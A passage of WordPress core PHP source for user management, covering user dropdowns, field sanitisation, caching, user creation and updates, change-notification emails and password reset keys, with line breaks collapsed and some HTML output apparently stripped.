'display_name_with_login' to show * the display name with user_login in parentheses. * Default 'display_name'. * @type int|bool $echo Whether to echo or return the drop-down. Accepts 1|true (echo) * or 0|false (return). Default 1|true. * @type int $selected Which user ID should be selected. Default 0. * @type bool $include_selected Whether to always include the selected user ID in the drop- * down. Default false. * @type string $name Name attribute of select element. Default 'user'. * @type string $id ID attribute of the select element. Default is the value of $name. * @type string $class Class attribute of the select element. Default empty. * @type int $blog_id ID of blog (Multisite only). Default is ID of the current blog. * @type string $who Which type of users to query. Accepts only an empty string or * 'authors'. Default empty. * @type string|array $role An array or a comma-separated list of role names that users must * match to be included in results. Note that this is an inclusive * list: users must match *each* role. Default empty. * @type array $role__in An array of role names. Matched users must have at least one of * these roles. Default empty array. * @type array $role__not_in An array of role names to exclude. Users matching one or more of * these roles will not be included in results. Default empty array. * } * @return string String of HTML content. */ function wp_dropdown_users( $args = '' ) { $defaults = array( 'show_option_all' => '', 'show_option_none' => '', 'hide_if_only_one_author' => '', 'orderby' => 'display_name', 'order' => 'ASC', 'include' => '', 'exclude' => '', 'multi' => 0, 'show' => 'display_name', 'echo' => 1, 'selected' => 0, 'name' => 'user', 'class' => '', 'id' => '', 'blog_id' => get_current_blog_id(), 'who' => '', 'include_selected' => false, 'option_none_value' => -1, 'role' => '', 'role__in' => array(), 'role__not_in' => array(), ); $defaults['selected'] = is_author() ? get_query_var( 'author' ) : 0; $r = wp_parse_args( $args, $defaults ); $query_args = wp_array_slice_assoc( $r, array( 'blog_id', 'include', 'exclude', 'orderby', 'order', 'who', 'role', 'role__in', 'role__not_in' ) ); $fields = array( 'ID', 'user_login' ); $show = ! empty( $r['show'] ) ? $r['show'] : 'display_name'; if ( 'display_name_with_login' === $show ) { $fields[] = 'display_name'; } else { $fields[] = $show; } $query_args['fields'] = $fields; $show_option_all = $r['show_option_all']; $show_option_none = $r['show_option_none']; $option_none_value = $r['option_none_value']; /** * Filters the query arguments for the list of users in the dropdown. * * @since 4.4.0 * * @param array $query_args The query arguments for get_users(). * @param array $r The arguments passed to wp_dropdown_users() combined with the defaults. */ $query_args = apply_filters( 'wp_dropdown_users_args', $query_args, $r ); $users = get_users( $query_args ); $output = ''; if ( ! empty( $users ) && ( empty( $r['hide_if_only_one_author'] ) || count( $users ) > 1 ) ) { $name = esc_attr( $r['name'] ); if ( $r['multi'] && ! $r['id'] ) { $id = ''; } else { $id = $r['id'] ? " id='" . esc_attr( $r['id'] ) . "'" : " id='$name'"; } $output = "'; } /** * Filters the wp_dropdown_users() HTML output. * * @since 2.3.0 * * @param string $output HTML output generated by wp_dropdown_users(). */ $html = apply_filters( 'wp_dropdown_users', $output ); if ( $r['echo'] ) { echo $html; } return $html; } /** * Sanitize user field based on context. * * Possible context values are: 'raw', 'edit', 'db', 'display', 'attribute' and 'js'. The * 'display' context is used by default. 'attribute' and 'js' contexts are treated like 'display' * when calling filters. * * @since 2.3.0 * * @param string $field The user Object field name. * @param mixed $value The user Object value. * @param int $user_id User ID. * @param string $context How to sanitize user fields. Looks for 'raw', 'edit', 'db', 'display', * 'attribute' and 'js'. * @return mixed Sanitized value. */ function sanitize_user_field( $field, $value, $user_id, $context ) { $int_fields = array( 'ID' ); if ( in_array( $field, $int_fields ) ) { $value = (int) $value; } if ( 'raw' == $context ) { return $value; } if ( ! is_string( $value ) && ! is_numeric( $value ) ) { return $value; } $prefixed = false !== strpos( $field, 'user_' ); if ( 'edit' == $context ) { if ( $prefixed ) { /** This filter is documented in wp-includes/post.php */ $value = apply_filters( "edit_{$field}", $value, $user_id ); } else { /** * Filters a user field value in the 'edit' context. * * The dynamic portion of the hook name, `$field`, refers to the prefixed user * field being filtered, such as 'user_login', 'user_email', 'first_name', etc. * * @since 2.9.0 * * @param mixed $value Value of the prefixed user field. * @param int $user_id User ID. */ $value = apply_filters( "edit_user_{$field}", $value, $user_id ); } if ( 'description' == $field ) { $value = esc_html( $value ); // textarea_escaped? } else { $value = esc_attr( $value ); } } elseif ( 'db' == $context ) { if ( $prefixed ) { /** This filter is documented in wp-includes/post.php */ $value = apply_filters( "pre_{$field}", $value ); } else { /** * Filters the value of a user field in the 'db' context. * * The dynamic portion of the hook name, `$field`, refers to the prefixed user * field being filtered, such as 'user_login', 'user_email', 'first_name', etc. * * @since 2.9.0 * * @param mixed $value Value of the prefixed user field. */ $value = apply_filters( "pre_user_{$field}", $value ); } } else { // Use display filters by default. if ( $prefixed ) { /** This filter is documented in wp-includes/post.php */ $value = apply_filters( "{$field}", $value, $user_id, $context ); } else { /** * Filters the value of a user field in a standard context. * * The dynamic portion of the hook name, `$field`, refers to the prefixed user * field being filtered, such as 'user_login', 'user_email', 'first_name', etc. * * @since 2.9.0 * * @param mixed $value The user object value to sanitize. * @param int $user_id User ID. * @param string $context The context to filter within. */ $value = apply_filters( "user_{$field}", $value, $user_id, $context ); } } if ( 'user_url' == $field ) { $value = esc_url( $value ); } if ( 'attribute' == $context ) { $value = esc_attr( $value ); } elseif ( 'js' == $context ) { $value = esc_js( $value ); } return $value; } /** * Update all user caches * * @since 3.0.0 * * @param WP_User $user User object to be cached * @return bool|null Returns false on failure. */ function update_user_caches( $user ) { if ( $user instanceof WP_User ) { if ( ! $user->exists() ) { return false; } $user = $user->data; } wp_cache_add( $user->ID, $user, 'users' ); wp_cache_add( $user->user_login, $user->ID, 'userlogins' ); wp_cache_add( $user->user_email, $user->ID, 'useremail' ); wp_cache_add( $user->user_nicename, $user->ID, 'userslugs' ); } /** * Clean all user caches * * @since 3.0.0 * @since 4.4.0 'clean_user_cache' action was added. * * @param WP_User|int $user User object or ID to be cleaned from the cache */ function clean_user_cache( $user ) { if ( is_numeric( $user ) ) { $user = new WP_User( $user ); } if ( ! $user->exists() ) { return; } wp_cache_delete( $user->ID, 'users' ); wp_cache_delete( $user->user_login, 'userlogins' ); wp_cache_delete( $user->user_email, 'useremail' ); wp_cache_delete( $user->user_nicename, 'userslugs' ); /** * Fires immediately after the given user's cache is cleaned. * * @since 4.4.0 * * @param int $user_id User ID. * @param WP_User $user User object. */ do_action( 'clean_user_cache', $user->ID, $user ); } /** * Determines whether the given username exists. * * For more information on this and similar theme functions, check out * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/ * Conditional Tags} article in the Theme Developer Handbook. * * @since 2.0.0 * * @param string $username Username. * @return int|false The user's ID on success, and false on failure. */ function username_exists( $username ) { $user = get_user_by( 'login', $username ); if ( $user ) { $user_id = $user->ID; } else { $user_id = false; } /** * Filters whether the given username exists or not. * * @since 4.9.0 * * @param int|false $user_id The user's ID on success, and false on failure. * @param string $username Username to check. */ return apply_filters( 'username_exists', $user_id, $username ); } /** * Determines whether the given email exists. * * For more information on this and similar theme functions, check out * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/ * Conditional Tags} article in the Theme Developer Handbook. * * @since 2.1.0 * * @param string $email Email. * @return int|false The user's ID on success, and false on failure. */ function email_exists( $email ) { $user = get_user_by( 'email', $email ); if ( $user ) { return $user->ID; } return false; } /** * Checks whether a username is valid. * * @since 2.0.1 * @since 4.4.0 Empty sanitized usernames are now considered invalid * * @param string $username Username. * @return bool Whether username given is valid */ function validate_username( $username ) { $sanitized = sanitize_user( $username, true ); $valid = ( $sanitized == $username && ! empty( $sanitized ) ); /** * Filters whether the provided username is valid or not. * * @since 2.0.1 * * @param bool $valid Whether given username is valid. * @param string $username Username to check. */ return apply_filters( 'validate_username', $valid, $username ); } /** * Insert a user into the database. * * Most of the `$userdata` array fields have filters associated with the values. Exceptions are * 'ID', 'rich_editing', 'syntax_highlighting', 'comment_shortcuts', 'admin_color', 'use_ssl', * 'user_registered', and 'role'. The filters have the prefix 'pre_user_' followed by the field * name. An example using 'description' would have the filter called, 'pre_user_description' that * can be hooked into. * * @since 2.0.0 * @since 3.6.0 The `aim`, `jabber`, and `yim` fields were removed as default user contact * methods for new installations. See wp_get_user_contact_methods(). * @since 4.7.0 The user's locale can be passed to `$userdata`. * * @global wpdb $wpdb WordPress database abstraction object. * * @param array|object|WP_User $userdata { * An array, object, or WP_User object of user data arguments. * * @type int $ID User ID. If supplied, the user will be updated. * @type string $user_pass The plain-text user password. * @type string $user_login The user's login username. * @type string $user_nicename The URL-friendly user name. * @type string $user_url The user URL. * @type string $user_email The user email address. * @type string $display_name The user's display name. * Default is the user's username. * @type string $nickname The user's nickname. * Default is the user's username. * @type string $first_name The user's first name. For new users, will be used * to build the first part of the user's display name * if `$display_name` is not specified. * @type string $last_name The user's last name. For new users, will be used * to build the second part of the user's display name * if `$display_name` is not specified. * @type string $description The user's biographical description. * @type string|bool $rich_editing Whether to enable the rich-editor for the user. * False if not empty. * @type string|bool $syntax_highlighting Whether to enable the rich code editor for the user. * False if not empty. * @type string|bool $comment_shortcuts Whether to enable comment moderation keyboard * shortcuts for the user. Default false. * @type string $admin_color Admin color scheme for the user. Default 'fresh'. * @type bool $use_ssl Whether the user should always access the admin over * https. Default false. * @type string $user_registered Date the user registered. Format is 'Y-m-d H:i:s'. * @type string|bool $show_admin_bar_front Whether to display the Admin Bar for the user on the * site's front end. Default true. * @type string $role User's role. * @type string $locale User's locale. Default empty. * } * @return int|WP_Error The newly created user's ID or a WP_Error object if the user could not * be created. */ function wp_insert_user( $userdata ) { global $wpdb; if ( $userdata instanceof stdClass ) { $userdata = get_object_vars( $userdata ); } elseif ( $userdata instanceof WP_User ) { $userdata = $userdata->to_array(); } // Are we updating or creating? if ( ! empty( $userdata['ID'] ) ) { $ID = (int) $userdata['ID']; $update = true; $old_user_data = get_userdata( $ID ); if ( ! $old_user_data ) { return new WP_Error( 'invalid_user_id', __( 'Invalid user ID.' ) ); } // hashed in wp_update_user(), plaintext if called directly $user_pass = ! empty( $userdata['user_pass'] ) ? $userdata['user_pass'] : $old_user_data->user_pass; } else { $update = false; // Hash the password $user_pass = wp_hash_password( $userdata['user_pass'] ); } $sanitized_user_login = sanitize_user( $userdata['user_login'], true ); /** * Filters a username after it has been sanitized. * * This filter is called before the user is created or updated. * * @since 2.0.3 * * @param string $sanitized_user_login Username after it has been sanitized. */ $pre_user_login = apply_filters( 'pre_user_login', $sanitized_user_login ); //Remove any non-printable chars from the login string to see if we have ended up with an empty username $user_login = trim( $pre_user_login ); // user_login must be between 0 and 60 characters. if ( empty( $user_login ) ) { return new WP_Error( 'empty_user_login', __( 'Cannot create a user with an empty login name.' ) ); } elseif ( mb_strlen( $user_login ) > 60 ) { return new WP_Error( 'user_login_too_long', __( 'Username may not be longer than 60 characters.' ) ); } if ( ! $update && username_exists( $user_login ) ) { return new WP_Error( 'existing_user_login', __( 'Sorry, that username already exists!' ) ); } /** * Filters the list of blacklisted usernames. * * @since 4.4.0 * * @param array $usernames Array of blacklisted usernames. */ $illegal_logins = (array) apply_filters( 'illegal_user_logins', array() ); if ( in_array( strtolower( $user_login ), array_map( 'strtolower', $illegal_logins ) ) ) { return new WP_Error( 'invalid_username', __( 'Sorry, that username is not allowed.' ) ); } /* * If a nicename is provided, remove unsafe user characters before using it. * Otherwise build a nicename from the user_login. */ if ( ! empty( $userdata['user_nicename'] ) ) { $user_nicename = sanitize_user( $userdata['user_nicename'], true ); if ( mb_strlen( $user_nicename ) > 50 ) { return new WP_Error( 'user_nicename_too_long', __( 'Nicename may not be longer than 50 characters.' ) ); } } else { $user_nicename = mb_substr( $user_login, 0, 50 ); } $user_nicename = sanitize_title( $user_nicename ); // Store values to save in user meta. $meta = array(); /** * Filters a user's nicename before the user is created or updated. * * @since 2.0.3 * * @param string $user_nicename The user's nicename. */ $user_nicename = apply_filters( 'pre_user_nicename', $user_nicename ); $raw_user_url = empty( $userdata['user_url'] ) ? '' : $userdata['user_url']; /** * Filters a user's URL before the user is created or updated. * * @since 2.0.3 * * @param string $raw_user_url The user's URL. */ $user_url = apply_filters( 'pre_user_url', $raw_user_url ); $raw_user_email = empty( $userdata['user_email'] ) ? '' : $userdata['user_email']; /** * Filters a user's email before the user is created or updated. * * @since 2.0.3 * * @param string $raw_user_email The user's email. */ $user_email = apply_filters( 'pre_user_email', $raw_user_email ); /* * If there is no update, just check for `email_exists`. If there is an update, * check if current email and new email are the same, or not, and check `email_exists` * accordingly. */ if ( ( ! $update || ( ! empty( $old_user_data ) && 0 !== strcasecmp( $user_email, $old_user_data->user_email ) ) ) && ! defined( 'WP_IMPORTING' ) && email_exists( $user_email ) ) { return new WP_Error( 'existing_user_email', __( 'Sorry, that email address is already used!' ) ); } $nickname = empty( $userdata['nickname'] ) ? $user_login : $userdata['nickname']; /** * Filters a user's nickname before the user is created or updated. * * @since 2.0.3 * * @param string $nickname The user's nickname. */ $meta['nickname'] = apply_filters( 'pre_user_nickname', $nickname ); $first_name = empty( $userdata['first_name'] ) ? '' : $userdata['first_name']; /** * Filters a user's first name before the user is created or updated. * * @since 2.0.3 * * @param string $first_name The user's first name. */ $meta['first_name'] = apply_filters( 'pre_user_first_name', $first_name ); $last_name = empty( $userdata['last_name'] ) ? '' : $userdata['last_name']; /** * Filters a user's last name before the user is created or updated. * * @since 2.0.3 * * @param string $last_name The user's last name. */ $meta['last_name'] = apply_filters( 'pre_user_last_name', $last_name ); if ( empty( $userdata['display_name'] ) ) { if ( $update ) { $display_name = $user_login; } elseif ( $meta['first_name'] && $meta['last_name'] ) { /* translators: 1: first name, 2: last name */ $display_name = sprintf( _x( '%1$s %2$s', 'Display name based on first name and last name' ), $meta['first_name'], $meta['last_name'] ); } elseif ( $meta['first_name'] ) { $display_name = $meta['first_name']; } elseif ( $meta['last_name'] ) { $display_name = $meta['last_name']; } else { $display_name = $user_login; } } else { $display_name = $userdata['display_name']; } /** * Filters a user's display name before the user is created or updated. * * @since 2.0.3 * * @param string $display_name The user's display name. */ $display_name = apply_filters( 'pre_user_display_name', $display_name ); $description = empty( $userdata['description'] ) ? '' : $userdata['description']; /** * Filters a user's description before the user is created or updated. * * @since 2.0.3 * * @param string $description The user's description. */ $meta['description'] = apply_filters( 'pre_user_description', $description ); $meta['rich_editing'] = empty( $userdata['rich_editing'] ) ? 'true' : $userdata['rich_editing']; $meta['syntax_highlighting'] = empty( $userdata['syntax_highlighting'] ) ? 'true' : $userdata['syntax_highlighting']; $meta['comment_shortcuts'] = empty( $userdata['comment_shortcuts'] ) || 'false' === $userdata['comment_shortcuts'] ? 'false' : 'true'; $admin_color = empty( $userdata['admin_color'] ) ? 'fresh' : $userdata['admin_color']; $meta['admin_color'] = preg_replace( '|[^a-z0-9 _.\-@]|i', '', $admin_color ); $meta['use_ssl'] = empty( $userdata['use_ssl'] ) ? 0 : $userdata['use_ssl']; $user_registered = empty( $userdata['user_registered'] ) ? gmdate( 'Y-m-d H:i:s' ) : $userdata['user_registered']; $meta['show_admin_bar_front'] = empty( $userdata['show_admin_bar_front'] ) ? 'true' : $userdata['show_admin_bar_front']; $meta['locale'] = isset( $userdata['locale'] ) ? $userdata['locale'] : ''; $user_nicename_check = $wpdb->get_var( $wpdb->prepare( "SELECT ID FROM $wpdb->users WHERE user_nicename = %s AND user_login != %s LIMIT 1", $user_nicename, $user_login ) ); if ( $user_nicename_check ) { $suffix = 2; while ( $user_nicename_check ) { // user_nicename allows 50 chars. Subtract one for a hyphen, plus the length of the suffix. $base_length = 49 - mb_strlen( $suffix ); $alt_user_nicename = mb_substr( $user_nicename, 0, $base_length ) . "-$suffix"; $user_nicename_check = $wpdb->get_var( $wpdb->prepare( "SELECT ID FROM $wpdb->users WHERE user_nicename = %s AND user_login != %s LIMIT 1", $alt_user_nicename, $user_login ) ); $suffix++; } $user_nicename = $alt_user_nicename; } $compacted = compact( 'user_pass', 'user_email', 'user_url', 'user_nicename', 'display_name', 'user_registered' ); $data = wp_unslash( $compacted ); if ( ! $update ) { $data = $data + compact( 'user_login' ); } /** * Filters user data before the record is created or updated. * * It only includes data in the wp_users table wp_user, not any user metadata. * * @since 4.9.0 * * @param array $data { * Values and keys for the user. * * @type string $user_login The user's login. Only included if $update == false * @type string $user_pass The user's password. * @type string $user_email The user's email. * @type string $user_url The user's url. * @type string $user_nicename The user's nice name. Defaults to a URL-safe version of user's login * @type string $display_name The user's display name. * @type string $user_registered MySQL timestamp describing the moment when the user registered. Defaults to * the current UTC timestamp. * } * @param bool $update Whether the user is being updated rather than created. * @param int|null $id ID of the user to be updated, or NULL if the user is being created. */ $data = apply_filters( 'wp_pre_insert_user_data', $data, $update, $update ? (int) $ID : null ); if ( $update ) { if ( $user_email !== $old_user_data->user_email || $user_pass !== $old_user_data->user_pass ) { $data['user_activation_key'] = ''; } $wpdb->update( $wpdb->users, $data, compact( 'ID' ) ); $user_id = (int) $ID; } else { $wpdb->insert( $wpdb->users, $data ); $user_id = (int) $wpdb->insert_id; } $user = new WP_User( $user_id ); /** * Filters a user's meta values and keys immediately after the user is created or updated * and before any user meta is inserted or updated. * * Does not include contact methods. These are added using `wp_get_user_contact_methods( $user )`. * * @since 4.4.0 * * @param array $meta { * Default meta values and keys for the user. * * @type string $nickname The user's nickname. Default is the user's username. * @type string $first_name The user's first name. * @type string $last_name The user's last name. * @type string $description The user's description. * @type bool $rich_editing Whether to enable the rich-editor for the user. False if not empty. * @type bool $syntax_highlighting Whether to enable the rich code editor for the user. False if not empty. * @type bool $comment_shortcuts Whether to enable keyboard shortcuts for the user. Default false. * @type string $admin_color The color scheme for a user's admin screen. Default 'fresh'. * @type int|bool $use_ssl Whether to force SSL on the user's admin area. 0|false if SSL is * not forced. * @type bool $show_admin_bar_front Whether to show the admin bar on the front end for the user. * Default true. * } * @param WP_User $user User object. * @param bool $update Whether the user is being updated rather than created. */ $meta = apply_filters( 'insert_user_meta', $meta, $user, $update ); // Update user meta. foreach ( $meta as $key => $value ) { update_user_meta( $user_id, $key, $value ); } foreach ( wp_get_user_contact_methods( $user ) as $key => $value ) { if ( isset( $userdata[ $key ] ) ) { update_user_meta( $user_id, $key, $userdata[ $key ] ); } } if ( isset( $userdata['role'] ) ) { $user->set_role( $userdata['role'] ); } elseif ( ! $update ) { $user->set_role( get_option( 'default_role' ) ); } wp_cache_delete( $user_id, 'users' ); wp_cache_delete( $user_login, 'userlogins' ); if ( $update ) { /** * Fires immediately after an existing user is updated. * * @since 2.0.0 * * @param int $user_id User ID. * @param WP_User $old_user_data Object containing user's data prior to update. */ do_action( 'profile_update', $user_id, $old_user_data ); } else { /** * Fires immediately after a new user is registered. * * @since 1.5.0 * * @param int $user_id User ID. */ do_action( 'user_register', $user_id ); } return $user_id; } /** * Update a user in the database. * * It is possible to update a user's password by specifying the 'user_pass' * value in the $userdata parameter array. * * If current user's password is being updated, then the cookies will be * cleared. * * @since 2.0.0 * * @see wp_insert_user() For what fields can be set in $userdata. * * @param array|object|WP_User $userdata An array of user data or a user object of type stdClass or WP_User. * @return int|WP_Error The updated user's ID or a WP_Error object if the user could not be updated. */ function wp_update_user( $userdata ) { if ( $userdata instanceof stdClass ) { $userdata = get_object_vars( $userdata ); } elseif ( $userdata instanceof WP_User ) { $userdata = $userdata->to_array(); } $ID = isset( $userdata['ID'] ) ? (int) $userdata['ID'] : 0; if ( ! $ID ) { return new WP_Error( 'invalid_user_id', __( 'Invalid user ID.' ) ); } // First, get all of the original fields $user_obj = get_userdata( $ID ); if ( ! $user_obj ) { return new WP_Error( 'invalid_user_id', __( 'Invalid user ID.' ) ); } $user = $user_obj->to_array(); // Add additional custom fields foreach ( _get_additional_user_keys( $user_obj ) as $key ) { $user[ $key ] = get_user_meta( $ID, $key, true ); } // Escape data pulled from DB. $user = add_magic_quotes( $user ); if ( ! empty( $userdata['user_pass'] ) && $userdata['user_pass'] !== $user_obj->user_pass ) { // If password is changing, hash it now $plaintext_pass = $userdata['user_pass']; $userdata['user_pass'] = wp_hash_password( $userdata['user_pass'] ); /** * Filters whether to send the password change email. * * @since 4.3.0 * * @see wp_insert_user() For `$user` and `$userdata` fields. * * @param bool $send Whether to send the email. * @param array $user The original user array. * @param array $userdata The updated user array. */ $send_password_change_email = apply_filters( 'send_password_change_email', true, $user, $userdata ); } if ( isset( $userdata['user_email'] ) && $user['user_email'] !== $userdata['user_email'] ) { /** * Filters whether to send the email change email. * * @since 4.3.0 * * @see wp_insert_user() For `$user` and `$userdata` fields. * * @param bool $send Whether to send the email. * @param array $user The original user array. * @param array $userdata The updated user array. */ $send_email_change_email = apply_filters( 'send_email_change_email', true, $user, $userdata ); } wp_cache_delete( $user['user_email'], 'useremail' ); wp_cache_delete( $user['user_nicename'], 'userslugs' ); // Merge old and new fields with new fields overwriting old ones. $userdata = array_merge( $user, $userdata ); $user_id = wp_insert_user( $userdata ); if ( ! is_wp_error( $user_id ) ) { $blog_name = wp_specialchars_decode( get_option( 'blogname' ), ENT_QUOTES ); $switched_locale = false; if ( ! empty( $send_password_change_email ) || ! empty( $send_email_change_email ) ) { $switched_locale = switch_to_locale( get_user_locale( $user_id ) ); } if ( ! empty( $send_password_change_email ) ) { /* translators: Do not translate USERNAME, ADMIN_EMAIL, EMAIL, SITENAME, SITEURL: those are placeholders. */ $pass_change_text = __( 'Hi ###USERNAME###, This notice confirms that your password was changed on ###SITENAME###. If you did not change your password, please contact the Site Administrator at ###ADMIN_EMAIL### This email has been sent to ###EMAIL### Regards, All at ###SITENAME### ###SITEURL###' ); $pass_change_email = array( 'to' => $user['user_email'], /* translators: Password change notification email subject. %s: Site name */ 'subject' => __( '[%s] Password Changed' ), 'message' => $pass_change_text, 'headers' => '', ); /** * Filters the contents of the email sent when the user's password is changed. * * @since 4.3.0 * * @param array $pass_change_email { * Used to build wp_mail(). * @type string $to The intended recipients. Add emails in a comma separated string. * @type string $subject The subject of the email. * @type string $message The content of the email. * The following strings have a special meaning and will get replaced dynamically: * - ###USERNAME### The current user's username. * - ###ADMIN_EMAIL### The admin email in case this was unexpected. * - ###EMAIL### The user's email address. * - ###SITENAME### The name of the site. * - ###SITEURL### The URL to the site. * @type string $headers Headers. Add headers in a newline (\r\n) separated string. * } * @param array $user The original user array. * @param array $userdata The updated user array. */ $pass_change_email = apply_filters( 'password_change_email', $pass_change_email, $user, $userdata ); $pass_change_email['message'] = str_replace( '###USERNAME###', $user['user_login'], $pass_change_email['message'] ); $pass_change_email['message'] = str_replace( '###ADMIN_EMAIL###', get_option( 'admin_email' ), $pass_change_email['message'] ); $pass_change_email['message'] = str_replace( '###EMAIL###', $user['user_email'], $pass_change_email['message'] ); $pass_change_email['message'] = str_replace( '###SITENAME###', $blog_name, $pass_change_email['message'] ); $pass_change_email['message'] = str_replace( '###SITEURL###', home_url(), $pass_change_email['message'] ); wp_mail( $pass_change_email['to'], sprintf( $pass_change_email['subject'], $blog_name ), $pass_change_email['message'], $pass_change_email['headers'] ); } if ( ! empty( $send_email_change_email ) ) { /* translators: Do not translate USERNAME, ADMIN_EMAIL, NEW_EMAIL, EMAIL, SITENAME, SITEURL: those are placeholders. */ $email_change_text = __( 'Hi ###USERNAME###, This notice confirms that your email address on ###SITENAME### was changed to ###NEW_EMAIL###. If you did not change your email, please contact the Site Administrator at ###ADMIN_EMAIL### This email has been sent to ###EMAIL### Regards, All at ###SITENAME### ###SITEURL###' ); $email_change_email = array( 'to' => $user['user_email'], /* translators: Email change notification email subject. %s: Site name */ 'subject' => __( '[%s] Email Changed' ), 'message' => $email_change_text, 'headers' => '', ); /** * Filters the contents of the email sent when the user's email is changed. * * @since 4.3.0 * * @param array $email_change_email { * Used to build wp_mail(). * @type string $to The intended recipients. * @type string $subject The subject of the email. * @type string $message The content of the email. * The following strings have a special meaning and will get replaced dynamically: * - ###USERNAME### The current user's username. * - ###ADMIN_EMAIL### The admin email in case this was unexpected. * - ###NEW_EMAIL### The new email address. * - ###EMAIL### The old email address. * - ###SITENAME### The name of the site. * - ###SITEURL### The URL to the site. * @type string $headers Headers. * } * @param array $user The original user array. * @param array $userdata The updated user array. */ $email_change_email = apply_filters( 'email_change_email', $email_change_email, $user, $userdata ); $email_change_email['message'] = str_replace( '###USERNAME###', $user['user_login'], $email_change_email['message'] ); $email_change_email['message'] = str_replace( '###ADMIN_EMAIL###', get_option( 'admin_email' ), $email_change_email['message'] ); $email_change_email['message'] = str_replace( '###NEW_EMAIL###', $userdata['user_email'], $email_change_email['message'] ); $email_change_email['message'] = str_replace( '###EMAIL###', $user['user_email'], $email_change_email['message'] ); $email_change_email['message'] = str_replace( '###SITENAME###', $blog_name, $email_change_email['message'] ); $email_change_email['message'] = str_replace( '###SITEURL###', home_url(), $email_change_email['message'] ); wp_mail( $email_change_email['to'], sprintf( $email_change_email['subject'], $blog_name ), $email_change_email['message'], $email_change_email['headers'] ); } if ( $switched_locale ) { restore_previous_locale(); } } // Update the cookies if the password changed. $current_user = wp_get_current_user(); if ( $current_user->ID == $ID ) { if ( isset( $plaintext_pass ) ) { wp_clear_auth_cookie(); // Here we calculate the expiration length of the current auth cookie and compare it to the default expiration. // If it's greater than this, then we know the user checked 'Remember Me' when they logged in. $logged_in_cookie = wp_parse_auth_cookie( '', 'logged_in' ); /** This filter is documented in wp-includes/pluggable.php */ $default_cookie_life = apply_filters( 'auth_cookie_expiration', ( 2 * DAY_IN_SECONDS ), $ID, false ); $remember = ( ( $logged_in_cookie['expiration'] - time() ) > $default_cookie_life ); wp_set_auth_cookie( $ID, $remember ); } } return $user_id; } /** * A simpler way of inserting a user into the database. * * Creates a new user with just the username, password, and email. For more * complex user creation use wp_insert_user() to specify more information. * * @since 2.0.0 * @see wp_insert_user() More complete way to create a new user * * @param string $username The user's username. * @param string $password The user's password. * @param string $email Optional. The user's email. Default empty. * @return int|WP_Error The newly created user's ID or a WP_Error object if the user could not * be created. */ function wp_create_user( $username, $password, $email = '' ) { $user_login = wp_slash( $username ); $user_email = wp_slash( $email ); $user_pass = $password; $userdata = compact( 'user_login', 'user_email', 'user_pass' ); return wp_insert_user( $userdata ); } /** * Returns a list of meta keys to be (maybe) populated in wp_update_user(). * * The list of keys returned via this function are dependent on the presence * of those keys in the user meta data to be set. * * @since 3.3.0 * @access private * * @param WP_User $user WP_User instance. * @return array List of user keys to be populated in wp_update_user(). */ function _get_additional_user_keys( $user ) { $keys = array( 'first_name', 'last_name', 'nickname', 'description', 'rich_editing', 'syntax_highlighting', 'comment_shortcuts', 'admin_color', 'use_ssl', 'show_admin_bar_front', 'locale' ); return array_merge( $keys, array_keys( wp_get_user_contact_methods( $user ) ) ); } /** * Set up the user contact methods. * * Default contact methods were removed in 3.6. A filter dictates contact methods. * * @since 3.7.0 * * @param WP_User $user Optional. WP_User object. * @return array Array of contact methods and their labels. */ function wp_get_user_contact_methods( $user = null ) { $methods = array(); if ( get_site_option( 'initial_db_version' ) < 23588 ) { $methods = array( 'aim' => __( 'AIM' ), 'yim' => __( 'Yahoo IM' ), 'jabber' => __( 'Jabber / Google Talk' ), ); } /** * Filters the user contact methods. * * @since 2.9.0 * * @param array $methods Array of contact methods and their labels. * @param WP_User $user WP_User object. */ return apply_filters( 'user_contactmethods', $methods, $user ); } /** * The old private function for setting up user contact methods. * * Use wp_get_user_contact_methods() instead. * * @since 2.9.0 * @access private * * @param WP_User $user Optional. WP_User object. Default null. * @return array Array of contact methods and their labels. */ function _wp_get_user_contactmethods( $user = null ) { return wp_get_user_contact_methods( $user ); } /** * Gets the text suggesting how to create strong passwords. * * @since 4.1.0 * * @return string The password hint text. */ function wp_get_password_hint() { $hint = __( 'Hint: The password should be at least twelve characters long. To make it stronger, use upper and lower case letters, numbers, and symbols like ! " ? $ % ^ & ).' ); /** * Filters the text describing the site's password complexity policy. * * @since 4.1.0 * * @param string $hint The password hint text. */ return apply_filters( 'password_hint', $hint ); } /** * Creates, stores, then returns a password reset key for user. * * @since 4.4.0 * * @global wpdb $wpdb WordPress database abstraction object. * @global PasswordHash $wp_hasher Portable PHP password hashing framework. * * @param WP_User $user User to retrieve password reset key for. * * @return string|WP_Error Password reset key on success. WP_Error on error. */ function get_password_reset_key( $user ) { global $wpdb, $wp_hasher; if ( ! ( $user instanceof WP_User ) ) { return new WP_Error( 'invalidcombo', __( 'ERROR: There is no account with that username or email address.' ) ); } /** * Fires before a new password is retrieved. * * Use the {@see 'retrieve_password'} hook instead. * * @since 1.5.0 * @deprecated 1.5.1 Misspelled. Use 'retrieve_password' hook instead. * * @param string $user_login The user login name. */ do_action( 'retreive_password', $user->user_login ); /** * Fires before a new password is retrieved. * * @since 1.5.1 * * @param string $user_login The user login name. */ do_action( 'retrieve_password', $user->user_login ); $allow = true; if ( is_multisite() && is_user_spammy( $user ) ) { $allow = false; } /** * Filters whether to allow a password to be reset. * * @since 2.7.0 * * @param bool $allow Whether to allow the password to be reset. Default true. * @param int $user_data->ID The ID of the user attempting to reset a password. */ $allow = apply_filters( 'allow_password_reset', $allow, $user->ID ); if ( ! $allow ) { return new WP_Error( 'no_password_reset', __( 'Password reset is not allowed for this user' ) ); } elseif ( is_wp_error( $allow ) ) { return $allow; } // Generate something random for a password reset key. $key = wp_generate_password( 20, false ); /** * Fires when a password reset key is generated. * * @since 2.5.0 * * @param string $user_login The username for the user. * @param string $key The generated password reset key. */ do_action( 'retrieve_password_key', $user->user_login, $key ); // Now insert the key, hashed, into the DB. if ( empty( $wp_hasher ) ) { require_once ABSPATH . WPINC . '/class-phpass.php'; $wp_hasher = new PasswordHash( 8, true ); } $hashed = time() . ':' . $wp_hasher->HashPassword( $key ); $key_saved = $wpdb->update( $wpdb->users, array( 'user_activation_key' => $hashed ), array( 'user_login' => $user->user_login ) ); if ( false === $key_saved ) { return new WP_Error( 'no_password_key_update', __( 'Could not save password reset key to database.' ) ); } return $key; } /** * Retrieves a user row based on password reset key and login * * A key is considered 'expired' if it exactly matches the value of the * user_activation_key field, rather than being matched after going through the * hashing process. This field is now hashed; old values are no longer accepted * but have a different WP_Error code so good user feedback can be provided. * * @since 3.1.0 * * @global wpdb 